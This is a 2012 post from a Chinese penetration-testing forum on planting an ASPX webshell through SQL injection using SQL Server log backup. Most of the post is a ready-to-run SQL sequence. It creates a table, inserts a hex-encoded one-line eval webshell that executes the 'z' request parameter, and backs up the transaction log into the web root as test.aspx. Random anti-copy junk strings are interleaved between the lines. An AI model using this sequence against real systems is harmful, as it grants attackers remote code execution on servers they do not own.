中国网络渗透测试联盟
标题:
关于aspx环境下log备份的一些思考
[打印本页]
作者:
admin
时间:
2012-9-5 14:57
标题:
关于aspx环境下log备份的一些思考
最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
. w8 ]- e. {' e+ s8 c9 n
但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
" c, x O+ m7 \3 x
经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。
$ c, G4 O5 M& o e+ o5 J3 l$ z; S% J
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。
0 S1 H$ f) P: N+ Y' J. f4 ^# x
$ R, b6 y9 B- ~: E0 V# a
--------------------------------------------------------------
/ B/ B# p: ~0 l% T4 k9 c; ?
今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,
0 E/ l7 C4 Y& y/ I6 v2 P( s
自己修改备份语句如下:
9 l' x$ d) ^& L# G( r) `5 t" ~
Drop table cmd;--
/ ~* R# H: s1 W3 q# U/ s1 @, H8 a( l
alter database db_test set RECOVERY FULL;--
6 i( t+ k$ z# n4 C9 t$ e
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段
. p; q2 L W! l
backup log db_test to disk = 'c:\bak' with init;--
9 }( ?- R) E2 i# T9 D" E# O- x
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
9 ?% |% j6 q: _2 @8 t
delete from cmd where id>1;--删除id>1的数据
( F5 j' E+ L( i" p. l2 K
backup log db_test to disk = 'e:\webroot\test.aspx';--
9 b9 T1 _# R. _8 t
Drop table cmd;--
$ L2 Y* @" F& n6 S2 S
希望对大家有用。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2